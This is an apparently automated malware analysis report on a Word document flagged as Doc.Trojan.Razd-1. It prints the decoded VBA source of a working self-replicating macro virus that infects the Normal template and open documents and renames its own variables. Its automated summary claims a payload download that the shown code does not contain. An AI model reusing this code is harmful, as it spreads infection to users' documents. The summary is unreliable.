Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1094904c5fa78c1…

MALICIOUS

Office (OLE)

27.0 KB Created: 2001-05-03 16:42:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 6abb0e53e552553afbc620a3d7a0c1cc SHA-1: 8d9491a8fb73bc3725306819d6139d02a9fdbd4a SHA-256: f1094904c5fa78c12f2498ec99e81de2e9bbcda75b89ec6ef57ca350b44f3178
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Razd-1. Static analysis revealed VBA macros within the document. The macro code appears to be obfuscated and attempts to manipulate the document's VBProject, likely to download and execute a second-stage payload. The specific functionality of the payload is not discernible from the provided script, hence the family is unknown.

Heuristics 2

  • ClamAV: Doc.Trojan.Razd-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Razd-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1798 bytes
SHA-256: 7dc30e1405e8eb393dd52be18c2f8a70c51499fee1c1cbd4ca3983ad651eba30
Detection
ClamAV: Doc.Trojan.Razd-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Razdego

Private Sub Document_Close()

KODWER = KODWER + 1

If Word.Templates(1).VBProject.VBComponents(1).CodeModule.Lines(KODWER, 2 - 1) <> "'Razdego" Then
    
     With Word.Templates(KODWER).VBProject.VBComponents(KODWER).CodeModule
     
        .DeleteLines KODWER, .CountOfLines
        
        .AddFromString kljuc(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(KODWER, _
ThisDocument.VBProject.VBComponents(KODWER).CodeModule.CountOfLines))

        
     End With
    
End If

If Word.ActiveDocument.VBProject.VBComponents(KODWER).CodeModule.Lines(KODWER, 2 - 1) <> "'Razdego" Then

    With Word.ActiveDocument.VBProject.VBComponents(KODWER).CodeModule
    
        .DeleteLines KODWER, .CountOfLines
        
        .AddFromString kljuc(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(KODWER, _
ThisDocument.VBProject.VBComponents(KODWER).CodeModule.CountOfLines))

        
    End With
    
End If

End Sub
Private Function kljuc(JIDWER)

Dim v(3)

v(1) = "LKJASD": v(2) = "KODWER": v(3) = "JIDWER"

For t = 1 To 3

Novi = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & _
Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65)

While InStr(1, JIDWER, v(t), vbTextCompare)

LKJASD = InStr(1, JIDWER, v(t), vbTextCompare)
    
JIDWER = Mid(JIDWER, 1, LKJASD - 1) & Novi & Mid(JIDWER, LKJASD + Len(v(t)), Len(JIDWER) - LKJASD)

Wend

Next

kljuc = JIDWER

End Functi